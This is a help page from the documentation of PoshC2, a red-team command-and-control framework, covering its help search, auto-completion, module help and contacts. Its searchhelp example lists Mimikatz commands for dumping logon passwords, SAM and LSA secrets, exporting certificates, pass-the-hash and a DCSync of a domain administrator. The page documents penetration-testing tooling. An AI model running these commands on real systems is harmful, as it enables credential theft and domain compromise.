Help¶
PoshC2 has multiple maintained options for receiving help while using the tool.
In the Implant-Handler, the help command can always be run to provide a smart list of commands that are relevant to the current context. For example, in a PowerShell implant, only PowerShell relevant commands will be shown.
This help can be searched through the use of the searchhelp command:
PS 1> searchhelp mimikatz
searchhelp mimikatz
invoke-mimikatz -command '"sekurlsa::logonpasswords"'
invoke-mimikatz -command '"lsadump::sam"'
invoke-mimikatz -command '"lsadump::lsa"'
invoke-mimikatz -command '"lsadump::cache"'
invoke-mimikatz -command '"lsadump::secrets"'
invoke-mimikatz -command '"ts::multirdp"'
invoke-mimikatz -command '"privilege::debug"'
invoke-mimikatz -command '"crypto::capi"'
invoke-mimikatz -command '"crypto::certificates /export"'
invoke-mimikatz -command '"sekurlsa::pth /user:<user> /domain:<dom> /ntlm:<hash> /run:c:\temp\run.bat"'
invoke-mimikatz -command '"lsadump::dcsync /domain:domain.local /user:administrator"'
Auto-completion¶
Furthermore, each prompt has an intelligent context sensitive autocompletion menu:
These commands are fuzzy-matched with the current text (for the first word only), so for example isc will match invoke-shellcode and wmi will show all the commands with wmi in them.
Auto-suggestions¶
Each prompt maintains a contextual command history and provides auto-suggestions. For example, commands issued at a C# implant prompt will have their own history, and when at a C# prompt fish-shell-like suggestions will appear in gray text from that contextual history. These suggestions can be completed by pressing the right-arrow key or Ctrl-e.
Module Help¶
For help on the individual modules in PoshC2, you can check the module source or run Get-Help for PowerShell modules once they have been loaded:
LoadModule Invoke-Mimikatz.ps1
Get-Help Invoke-Mimikatz
For C# and Python modules, if the module has help it can be loaded and run to display the help.
loadmodule MyHelpfulModule.exe
run-exe MyHelpfulModuleNamespace.MyHelpfulModuleClassName MyHelpfulModuleAssemblyName --help
Python Documentation¶
PoshC2 is also fully documented in python3 here. As PoshC2 is ever evolving and is always being updated with the latest tactics and techniques. To that end we recommend that users explore PoshC2’s source code to fully understand what is going on under the hood and how to tweak and adjust PoshC2 to match their needs and environment. For any help in doing this, see the Keep In Touch section below.
Keep In Touch¶
For all the latest news and features, or for the latest documentation and support check out the PoshC2 GitHub page or find us below:
- Find us on Twitter - @Nettitude_Labs.
- Find us on Slack - poshc2.slack.com (Send email to labs below to be added to slack channel).
- Find us on Email - labs@nettitude.com.
Key Contributors¶
- Ben Turner - @benpturner
- Rob Bone - @m0rv4i
- Rob Maslen - @rbmaslen
- Doug McLeod - @b4ggio_su
- Rich Hicks - @scriptmonkey_
- Phil Lynch - @plynch98
- Ross Bingham - @pwndexter